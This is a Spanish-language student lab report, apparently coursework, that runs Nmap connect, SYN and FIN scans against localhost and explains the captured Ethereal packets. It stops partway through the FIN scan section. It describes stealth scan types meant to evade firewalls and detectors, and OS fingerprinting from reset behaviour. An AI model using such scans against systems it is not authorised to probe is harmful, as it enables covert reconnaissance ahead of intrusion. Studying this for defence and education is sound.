Pruebas Nmap y TCPDump en Knoppix

Ejercicio 1: Exploracin de puertos mediante Nmap

1) Utilizando Nmap, realizad una exploracin de los puertos TCP de vuestra mquina. Indicad el comando y mostrad los resultados.
Para realizar este apartado usamos el knoppix std entregado con el material del curso. Una vez arrancado el knoppix abrimos un terminal y nos convertimos en root para poder lanzar el comando nmap (es requisito imprescindible tener permisos de root para lanzar el comando). A continuacin usamos el comando ifconfig para ver las interfaces de red y nuestras direcciones IP:

knoppix@ttyp0[knoppix]$ rootme root@ttyp0[knoppix]# ifconfig lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:12 errors:0 dropped:0 overruns:0 frame:0 TX packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:600 (600.0 b) TX bytes:600 (600.0 b) root@ttyp0[knoppix]#

Como podemos ver slo disponemos de la interface de loopback y de la direccin IP de loopback (la 127.0.0.1). Usamos el comando nmap sobre esta direccin IP:

root@ttyp1[knoppix]# nmap -sT -v 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating Connect() Scan against Knoppix (127.0.0.1) Adding open port 68/tcp Adding open port 6000/tcp The Connect() Scan took 0 seconds to scan 1605 ports. Interesting ports on Knoppix (127.0.0.1): (The 1603 ports scanned but not shown below are in state: closed) Port State Service 68/tcp open dhcpclient 6000/tcp open X11 Nmap run completed -- 1 IP address (1 host up) scanned in 0.351 seconds

Como podemos ver por los resultados el nmap ha encontrado dos puertos TCP abiertos. Estos puertos son el puerto 68 dhcpclient (es el cliente de dhcp para obtener dinmicamente direcciones IP) y el puerto 6000 x11 (correspondiente a la XWindows del entorno grfico del knoppix, en este caso el KDE). El resto de los puertos TCP estn cerrados segn el nmap.

1 de 32

2) Iniciad un servidor web en vuestra mquina y repetid el ejercicio anterior. Comentad las (previsibles) diferencias entre los dos resultados
Iniciamos el servidor web desde el entorno grfico del knoppix (el KDE), desde el men principal -> Servers -> server http -> start httpd Una vez lo tuvimos arrancado, lanzamos el mismo comando de nmap que en el apartado anterior:
root@ttyp1[knoppix]# nmap -sT -v 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating Connect() Scan against Knoppix (127.0.0.1) Adding open port 68/tcp Adding open port 80/tcp Adding open port 6000/tcp The Connect() Scan took 0 seconds to scan 1605 ports. Interesting ports on Knoppix (127.0.0.1): (The 1602 ports scanned but not shown below are in state: closed) Port State Service 68/tcp open dhcpclient 80/tcp open http 6000/tcp open X11 Nmap run completed -- 1 IP address (1 host up) scanned in 0.342 seconds

Ahora, tal y como esperbamos, podemos ver que el nmap encuentra tambin abierto el puerto tcp 80 que es el del servicio http.

3) Iniciad algn otro servicio TCP y repetid la exploracin.

Para iniciar algn servicio TCP ms lo que hicimos fue arrancar el servidor de ssh. Iniciamos el servidor ssh desde el entorno grfico del knoppix (el KDE), desde el men principal -> Servers -> server ssh -> start sshd Una vez lo tuvimos arrancado, lanzamos el mismo comando de nmap que en el apartado anterior:
root@ttyp1[knoppix]# nmap -sT -v 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating Connect() Scan against Knoppix (127.0.0.1) Adding open port 68/tcp Adding open port 22/tcp Adding open port 6000/tcp Adding open port 80/tcp The Connect() Scan took 0 seconds to scan 1605 ports. Interesting ports on Knoppix (127.0.0.1): (The 1601 ports scanned but not shown below are in state: closed) Port State Service 22/tcp open ssh 68/tcp open dhcpclient

2 de 32

80/tcp 6000/tcp

open open

http X11

Nmap run completed -- 1 IP address (1 host up) scanned in 0.346 seconds

Tal y como esperbamos, el nmap encuentra que el puerto del servicio de ssh (secure shell), correspondiente al nmero 22 se encuentra ahora abierto. Siguen abiertos los puertos 68, 80 y 6000. El resto de los puertos siguen cerrados.

Ejercicio 2: Distintas tcnicas para la exploracin TCP

Iniciad un sniffer (por ejemplo, TCPdump, Snort o Ethereal) para que capture los paquetes TCP que circulan a travs de la interface de loopback de vuestra mquina. A continuacin, realizad la exploracin de un puerto (slo uno) TCP donde sepis que tenis un servicio funcionando y la exploracin de otro puerto donde sepis que no hay ningn servicio funcionando, mediante las siguientes tcnicas de exploracin.

1) TCP connect scan

Es la forma ms bsica de escaneo TCP. La llamada de sistema connect() proporcionada por nuestro sistema operativo se usa para establecer una conexin con todos los puertos interesantes de la maquina. Si el puerto est a la escucha, connect() tendr xito, de otro modo, el puerto resulta inalcanzable. Una ventaja importante de esta tcnica es que no resulta necesario tener privilegios especiales. Cualquier usuario en la mayora de los sistemas UNIX tiene permiso para usar esta llamada. Este tipo de escaneo resulta fcilmente detectable dado que los registros del servidor de destino muestran un montn de conexiones y mensajes de error para aquellos servicios que accept() (aceptan) la conexin para luego cerrarla inmediatamente. Como puerto TCP abierto usamos el puerto 80 (el de http) y como puerto TCP cerrado usamos el puerto 90 (tiene el servicio de DNSIX Securit Attribute Token Map). Los comandos de nmap que usamos fueron los siguientes:
root@ttyp1[knoppix]# nmap -sT -P0 -v -p 80 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating Connect() Scan against Knoppix (127.0.0.1) Adding open port 80/tcp The Connect() Scan took 0 seconds to scan 1 ports. Interesting ports on Knoppix (127.0.0.1): Port State Service 80/tcp open http Nmap run completed -- 1 IP address (1 host up) scanned in 0.012 seconds root@ttyp1[knoppix]# nmap -sT -P0 -v -p 90 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good.

3 de 32

Initiating Connect() Scan against Knoppix (127.0.0.1) The Connect() Scan took 0 seconds to scan 1 ports. The 1 scanned port on Knoppix (127.0.0.1) is: closed Nmap run completed -- 1 IP address (1 host up) scanned in 0.004 seconds

Tal y como suponamos el nmap encuentra que el puerto 80 est abierto y el puerto 90 est cerrado. Para capturar el trfico generado por ambos comandos usamos el sniffer Ethereal al que aadimos un filtro para que slo capturara el trfico TCP que transitara por la interface de loopback. La captura que ha hecho el sniffer de Ethereal con ambos comandos fue la siguiente:
Frame 1 (74 on wire, 74 captured) Arrival Time: Mar 25, 2006 19:41:26.063931000 Time delta from previous packet: 0.000000000 seconds Time relative to first packet: 0.000000000 seconds Frame Number: 1 Packet Length: 74 bytes Capture Length: 74 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 60 Identification: 0x5374 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0xe945 (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 47228 (47228), Dst Port: www (80), Seq: 4140123558, Ack: 0, Len: 0 Source port: 47228 (47228) Destination port: www (80) Sequence number: 4140123558 Header length: 40 bytes Flags: 0x0002 (SYN) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set

4 de 32

.... .0.. = Reset: Not set .... ..1. = Syn: Set .... ...0 = Fin: Not set Window size: 32767 Checksum: 0x839c (correct) Options: (20 bytes) Maximum segment size: 16396 bytes SACK permitted Time stamp: tsval 399058, tsecr 0 NOP Window scale: 0 bytes Frame 2 (74 on wire, 74 captured) Arrival Time: Mar 25, 2006 19:41:26.063963000 Time delta from previous packet: 0.000032000 seconds Time relative to first packet: 0.000032000 seconds Frame Number: 2 Packet Length: 74 bytes Capture Length: 74 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 60 Identification: 0x0000 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0x3cba (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: www (80), Dst Port: 47228 (47228), Seq: 4156044603, Ack: 4140123559, Len: 0 Source port: www (80) Destination port: 47228 (47228) Sequence number: 4156044603 Acknowledgement number: 4140123559 Header length: 40 bytes Flags: 0x0012 (SYN, ACK) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...1 .... = Acknowledgment: Set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..1. = Syn: Set .... ...0 = Fin: Not set Window size: 32767

5 de 32

Checksum: 0x3fbf (correct) Options: (20 bytes) Maximum segment size: 16396 bytes SACK permitted Time stamp: tsval 399058, tsecr 399058 NOP Window scale: 0 bytes Frame 3 (66 on wire, 66 captured) Arrival Time: Mar 25, 2006 19:41:26.063983000 Time delta from previous packet: 0.000020000 seconds Time relative to first packet: 0.000052000 seconds Frame Number: 3 Packet Length: 66 bytes Capture Length: 66 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 52 Identification: 0x5375 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0xe94c (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 47228 (47228), Dst Port: www (80), Seq: 4140123559, Ack: 4156044604, Len: 0 Source port: 47228 (47228) Destination port: www (80) Sequence number: 4140123559 Acknowledgement number: 4156044604 Header length: 32 bytes Flags: 0x0010 (ACK) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...1 .... = Acknowledgment: Set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 32767 Checksum: 0xa8dc (correct) Options: (12 bytes) NOP NOP

6 de 32

Time stamp: tsval 399058, tsecr 399058 Frame 4 (66 on wire, 66 captured) Arrival Time: Mar 25, 2006 19:41:26.064304000 Time delta from previous packet: 0.000321000 seconds Time relative to first packet: 0.000373000 seconds Frame Number: 4 Packet Length: 66 bytes Capture Length: 66 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 52 Identification: 0x5376 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0xe94b (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 47228 (47228), Dst Port: www (80), Seq: 4140123559, Ack: 4156044604, Len: 0 Source port: 47228 (47228) Destination port: www (80) Sequence number: 4140123559 Acknowledgement number: 4156044604 Header length: 32 bytes Flags: 0x0014 (RST, ACK) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...1 .... = Acknowledgment: Set .... 0... = Push: Not set .... .1.. = Reset: Set .... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 32767 Checksum: 0xa8d8 (correct) Options: (12 bytes) NOP NOP Time stamp: tsval 399058, tsecr 399058 Frame 5 (74 on wire, 74 captured) Arrival Time: Mar 25, 2006 19:41:34.067922000 Time delta from previous packet: 8.003618000 seconds Time relative to first packet: 8.003991000 seconds

7 de 32

Frame Number: 5 Packet Length: 74 bytes Capture Length: 74 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 60 Identification: 0x5c88 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0xe031 (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 47229 (47229), Dst Port: 90 (90), Seq: 4149691770, Ack: 0, Len: 0 Source port: 47229 (47229) Destination port: 90 (90) Sequence number: 4149691770 Header length: 40 bytes Flags: 0x0002 (SYN) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..1. = Syn: Set .... ...0 = Fin: Not set Window size: 32767 Checksum: 0x800b (correct) Options: (20 bytes) Maximum segment size: 16396 bytes SACK permitted Time stamp: tsval 399858, tsecr 0 NOP Window scale: 0 bytes Frame 6 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:41:34.067948000 Time delta from previous packet: 0.000026000 seconds Time relative to first packet: 8.004017000 seconds Frame Number: 6 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00)

8 de 32

Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x0000 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0x3cce (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 90 (90), Dst Port: 47229 (47229), Seq: 0, Ack: 4149691771, Len: 0 Source port: 90 (90) Destination port: 47229 (47229) Sequence number: 0 Acknowledgement number: 4149691771 Header length: 20 bytes Flags: 0x0014 (RST, ACK) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...1 .... = Acknowledgment: Set .... 0... = Push: Not set .... .1.. = Reset: Set .... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 0 Checksum: 0xbc23 (correct)

Como podemos ver el Ethereal ha capturados seis frames: En el frame 1 el nmap (desde el puerto 47228) lanza una peticin de SYN sobre el puerto 80 de http. Se trata del inicio del intento de conexin. En el frame 2 es el puerto 80 de http el que responde al puerto 47228 (el nmap) con un flag de SYN y de ACK indicando que le ha llegado su peticin de sincronizacin y mandando a su vez la sincronizacin al puerto del nmap indicando que est listo para recibir peticiones, esto quiere decir que el puerto est abierto y en servicio. En el frame 3 es el nmap de nuevo, por medio del puerto 47228 el que manda un flag de ACK al puerto de http 80 indicando que ha recibido su flag de SYN. En este momento la conexin se ha establecido entre ambos puertos. En el frame 4 es de nuevo el nmap, el que, por medio del puerto 47228 manda los flags de RST (reset de la conexin) y ACK al puerto de http (80) para confirmar el fin de la conexin (ya que el nico fin del escaneo es comprobar que puertos estn activos y en servicio, nada ms). 9 de 32

El nmap comprueba que el puerto 80 est activo y en servicio en el frame 2 cuando recibe los flags de SYN y ACK por parte del puerto 80, es decir, el puerto 80 confirma que est activo y en servicio al confirmar con un SYN el intento de conexin anterior del nmap (que tambin realiz con un flag SYN). En el frame 5 vemos que el nmap, por medio del puerto 47229 manda un flag de SYN al puerto 90 intentando realizar un intento de conexin. En el frame 6 es el puerto 90 el que manda los flags de RST y ACK al puerto 47229 del nmap para terminar con el intento de conexin. En este momento el nmap se da cuenta de que el puerto 90 est cerrado (inactivo y sin ningn servicio funcionando).

2) TCP SYN scan

A menudo se denomina a esta tcnica escaneo "half open" (medio abierto), porque no se abre una conexin TCP completa. Se enva un paquete SYN, como si se fuese a abrir una conexin real y se espera que llegue una respuesta. Un SYN,ACK indica que el puerto esta a la escucha. Un RST es indicativo de que el puerto no esta a la escucha. Si se recibe un SYN,ACK, se enva un RST inmediatamente para cortar la conexin (en realidad es el kernel de nuestro sistema operativo el que hace esto por nosotros). La ventaja principal de esta tcnica de escaneo es que ser registrada por muchos menos servidores que la anterior. Por desgracia se necesitan privilegios de root para construir estos paquetes SYN modificados. Los comandos de nmap que usamos fueron los siguientes:
root@ttyp1[knoppix]# nmap -sS -P0 -v -p 80 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating SYN Stealth Scan against Knoppix (127.0.0.1) Adding open port 80/tcp The SYN Stealth Scan took 0 seconds to scan 1 ports. Interesting ports on Knoppix (127.0.0.1): Port State Service 80/tcp open http Nmap run completed -- 1 IP address (1 host up) scanned in 0.013 seconds root@ttyp1[knoppix]# nmap -sS -P0 -v -p 90 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ ) Host Knoppix (127.0.0.1) appears to be up ... good. Initiating SYN Stealth Scan against Knoppix (127.0.0.1) The SYN Stealth Scan took 0 seconds to scan 1 ports. The 1 scanned port on Knoppix (127.0.0.1) is: closed Nmap run completed -- 1 IP address (1 host up) scanned in 0.004 seconds

La captura que ha hecho el sniffer de Ethereal con ambos comandos fue la siguiente:
Frame 1 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:46:03.835948000 Time delta from previous packet: 0.000000000 seconds Time relative to first packet: 0.000000000 seconds

10 de 32

Frame Number: 1 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x62a7 Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 40 Protocol: TCP (0x06) Header checksum: 0x3227 (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 50785 (50785), Dst Port: www (80), Seq: 1334789943, Ack: 0, Len: 0 Source port: 50785 (50785) Destination port: www (80) Sequence number: 1334789943 Header length: 20 bytes Flags: 0x0002 (SYN) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..1. = Syn: Set .... ...0 = Fin: Not set Window size: 1024 Checksum: 0x5068 (correct) Frame 2 (58 on wire, 58 captured) Arrival Time: Mar 25, 2006 19:46:03.835984000 Time delta from previous packet: 0.000036000 seconds Time relative to first packet: 0.000036000 seconds Frame Number: 2 Packet Length: 58 bytes Capture Length: 58 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes

11 de 32

Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 44 Identification: 0x0000 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0x3cca (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: www (80), Dst Port: 50785 (50785), Seq: 133290923, Ack: 1334789944, Len: 0 Source port: www (80) Destination port: 50785 (50785) Sequence number: 133290923 Acknowledgement number: 1334789944 Header length: 24 bytes Flags: 0x0012 (SYN, ACK) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...1 .... = Acknowledgment: Set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..1. = Syn: Set .... ...0 = Fin: Not set Window size: 32767 Checksum: 0x9ea6 (correct) Options: (4 bytes) Maximum segment size: 16396 bytes Frame 3 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:46:03.835998000 Time delta from previous packet: 0.000014000 seconds Time relative to first packet: 0.000050000 seconds Frame Number: 3 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x0000 Flags: 0x04

12 de 32

.1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0x3cce (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 50785 (50785), Dst Port: www (80), Seq: 1334789944, Ack: 0, Len: 0 Source port: 50785 (50785) Destination port: www (80) Sequence number: 1334789944 Header length: 20 bytes Flags: 0x0004 (RST) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .1.. = Reset: Set .... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 0 Checksum: 0x5465 (correct) Frame 4 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:46:10.978947000 Time delta from previous packet: 7.142949000 seconds Time relative to first packet: 7.142999000 seconds Frame Number: 4 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x6e24 Flags: 0x00 .0.. = Don't fragment: Not set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 43 Protocol: TCP (0x06) Header checksum: 0x23aa (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 52255 (52255), Dst Port: 90 (90), Seq: 965727951, Ack: 0, Len: 0 Source port: 52255 (52255)

13 de 32

Destination port: 90 (90) Sequence number: 965727951 Header length: 20 bytes Flags: 0x0002 (SYN) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...0 .... = Acknowledgment: Not set .... 0... = Push: Not set .... .0.. = Reset: Not set .... ..1. = Syn: Set .... ...0 = Fin: Not set Window size: 4096 Checksum: 0xc507 (correct) Frame 5 (54 on wire, 54 captured) Arrival Time: Mar 25, 2006 19:46:10.978973000 Time delta from previous packet: 0.000026000 seconds Time relative to first packet: 7.143025000 seconds Frame Number: 5 Packet Length: 54 bytes Capture Length: 54 bytes Ethernet II Destination: 00:00:00:00:00:00 (XEROX_00:00:00) Source: 00:00:00:00:00:00 (XEROX_00:00:00) Type: IP (0x0800) Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1) Version: 4 Header length: 20 bytes Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00) 0000 00.. = Differentiated Services Codepoint: Default (0x00) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 40 Identification: 0x0000 Flags: 0x04 .1.. = Don't fragment: Set ..0. = More fragments: Not set Fragment offset: 0 Time to live: 64 Protocol: TCP (0x06) Header checksum: 0x3cce (correct) Source: Knoppix (127.0.0.1) Destination: Knoppix (127.0.0.1) Transmission Control Protocol, Src Port: 90 (90), Dst Port: 52255 (52255), Seq: 0, Ack: 965727952, Len: 0 Source port: 90 (90) Destination port: 52255 (52255) Sequence number: 0 Acknowledgement number: 965727952 Header length: 20 bytes Flags: 0x0014 (RST, ACK) 0... .... = Congestion Window Reduced (CWR): Not set .0.. .... = ECN-Echo: Not set ..0. .... = Urgent: Not set ...1 .... = Acknowledgment: Set .... 0... = Push: Not set .... .1.. = Reset: Set

14 de 32

.... ..0. = Syn: Not set .... ...0 = Fin: Not set Window size: 0 Checksum: 0xd4f4 (correct)

Como podemos ver el Ethereal ha capturados cinco frames: En el frame 1 el nmap (desde el puerto 50785) lanza una peticin de SYN sobre el puerto 80 de http. Se trata del inicio del intento de conexin. En el frame 2 es el puerto 80 de http el que responde al puerto 50785 (el nmap) con un flag de SYN y de ACK indicando que le ha llegado su peticin de sincronizacin y mandando a su vez la sincronizacin al puerto del nmap indicando que est listo para recibir peticiones, esto quiere decir que el puerto est abierto y en servicio. En el frame 3 es el nmap de nuevo, por medio del puerto 50785 el que manda un flag de RST (reset de la conexin) al puerto de http 80 para indicar que se termina la conexin entre ambos. El nmap comprueba que el puerto 80 est activo y en servicio en el frame 2 cuando recibe los flags de SYN y ACK por parte del puerto 80, es decir, el puerto 80 confirma que est activo y en servicio al confirmar con un SYN el intento de conexin anterior del nmap (que tambin realiz con un flag SYN). En el frame 4 vemos que el nmap, por medio del puerto 52255 manda un flag de SYN al puerto 90 intentando realizar un intento de conexin. En el frame 5 es el puerto 90 el que manda los flags de RST y ACK al puerto 52255 del nmap para terminar con el intento de conexin. En este momento el nmap se da cuenta de que el puerto 90 est cerrado (inactivo y sin ningn servicio funcionando).

3) TCP FIN scan

A veces ni siquiera el escaneo SYN resulta lo suficientemente clandestino. Algunas firewalls y filtros de paquetes vigilan el envo de paquetes SYN a puertos restringidos, y programas disponibles como Synlogger y Courtney detectan este tipo de escaneo. Estos tipos de escaneo avanzado, sin embargo, pueden cruzar estas barreras sin ser detectados. La idea es que se requiere que los puertos cerrados respondan a nuestro paquete de prueba con un RST, mientras que los puertos abiertos deben ignorar los paquetes en cuestin. El escaneo FIN utiliza un paquete FIN vaco (sorpresa) como prueba, mientras que el escaneo Xmas tree activa las flags FIN, URG y PUSH. El escaneo NULL desactiva todas las flags. Por desgracia Microsoft (como de costumbre) decidi ignorar el estndar completamente y hacer las cosas a su manera. Debido a esto, este tipo de escaneo no funcionara con sistemas basados en Windows95/NT. En el lado positivo, esta es una buena manera de distinguir entre las dos plataformas. Si el escaneo encuentra puertos cerrados, probablemente se trate de una maquina UNIX, mientras que todos los puertos abiertos es indicativo de Windows. Excepcionalmente, Cisco, BSDI, HP/UX, MVS e IRIX tambin envan RSTs en vez de desechar el paquete. Los comandos de nmap que usamos fueron los siguientes:
root@ttyp1[knoppix]# nmap -sF -P0 -v -p 80 127.0.0.1 Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )

15 de 32

